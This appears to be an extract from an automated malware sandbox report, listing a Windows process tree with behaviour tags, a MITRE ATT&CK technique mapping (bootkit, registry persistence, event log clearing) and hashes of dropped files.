C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3276
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3756
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2356
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4708
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:4308
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe e9795c555139de4cf0d034322dbb5aec YS2a6twPuE2z8u6ZVp12jA.0.1.0.0.01⤵
- Sets service image path in registry
- Modifies data under HKEY_USERS
PID:1312 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2980
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:2432
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1324
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2192
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1680 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 1792 -ip 17922⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2248
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 4984 -ip 49842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1464
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 4984 -ip 49842⤵PID:2936
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:4572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:3068
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
1Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38KB
MD5d32dfbe4d3cfb889b6d8962adce54178
SHA19495901124463e11a2aa534131104a106bad98c2
SHA25664bfed29d07feb84688bc241213c09fafab5eae2a72cf2459ce0491edfb6f7c5
SHA51258266abb15a0b4b902b7a9ebee3e5c5d5e52a692cd84327e04b5a7f95ea1a3e4d5bc9637bce9d105202b5014b26fe1c661e5866109ff30cfc17c052f4555dada
-
Filesize
13KB
MD59c984cecfec3e85a5dcca3d70b7e545e
SHA196e3d5378014732780096f16d440d1142fda6f2f
SHA2563a06f233554ca717e8e7a03a22dbdf3593619d9c834ca3a645de00bddc42e0e5
SHA5127f17a90888c81dc0d683dd8a36bc9852fe98e2cebb3907d2d63d1c44227d390eb9b5cadf0af8cd95882f425050b3f376a02a21bea8fc07235ed3bb512a33a9f5
-
Filesize
38KB
MD5273c4d30c6e05037d0ee3a558840569e
SHA1dbae802249e669cfc8822f2f1b0e8529d0a05b05
SHA256bc0d91b05b3accc95d3cd09f7330ba894ec74b64b709dd71811fd2f6dd03a874
SHA5129f4410b0bac4312dbcf0d126c792827e4f3570a9c0ea65320d6ad09af5751e37569e5fbd04e2bd66df17c430da57912acba2e3a679f98f3433c1213ba1dadc33
-
Filesize
13KB
MD5fda31f58817503e97f0a778d9920181d
SHA18de5ccb5c7c98db7755ba20d79576fe737de175f
SHA2569cf35400a57c3551f82b2d7056fc9a2279e96a0101a2687efd222f19306f073f
SHA512acef08109d18a9ed9c4f9b324bb8a9614e7c4ee4c44598bc99c4692a7cfc1a2df40fd616d4b3c86c19c2638cbbaad48094d5c661ec4cd59061987f9d5fac9d36
-
Filesize
3KB
MD5bb8306e1bcf2e988e16c1aee4383f269
SHA13f261ea9b6df59d223f7c61adddc7f6f515e6e4e
SHA256859eb6128cadf870e8235e87af15e13e6243b84690f641612be03c8dd83c4b98
SHA512ad95bd6d26de7cea5ddaa4c3d92ced71899be98bac8593fed13b815a25eccd71817300f0cde97d87d3722515691a4a82a7d2d06a832d6181f05ccd73649247d3
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
3KB
MD576a18ac328480a11da294618d5d31ffd
SHA10224f6c541f3e833a9bbe76184ec4b2b5487fe62
SHA256e0ed940dd5e72400cd69d53a59216af270adbfd107742485db35b4623ed710e6
SHA512f73d3ec83eff892ca425cc7cacf2e06f77b0edd24a8b5fa4e8ff02349a9653553884e3ee41c650bc17598392da08a8e230eadf129dcac4e0ea1e19d01ac84bbe
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36KB
MD5b943a57bdf1bbd9c33ab0d33ff885983
SHA11cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize
7.4MB
MD56b47b9a393a85371aae15aa9db27077b
SHA1fe35bc8723726c87e960abc083c08ad444152223
SHA256f8e1178ed62fc639722c51acc76f11eef71b79b6dadb09e47c09bc390769c3b1
SHA51205588b1705a5879342ae111b62fa4df1f2d49e9837c36a6efcbf0674d6cedb4b104a52520284ff34221ba743811e5f084baa088fa8cce1867d242be44e6da847
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4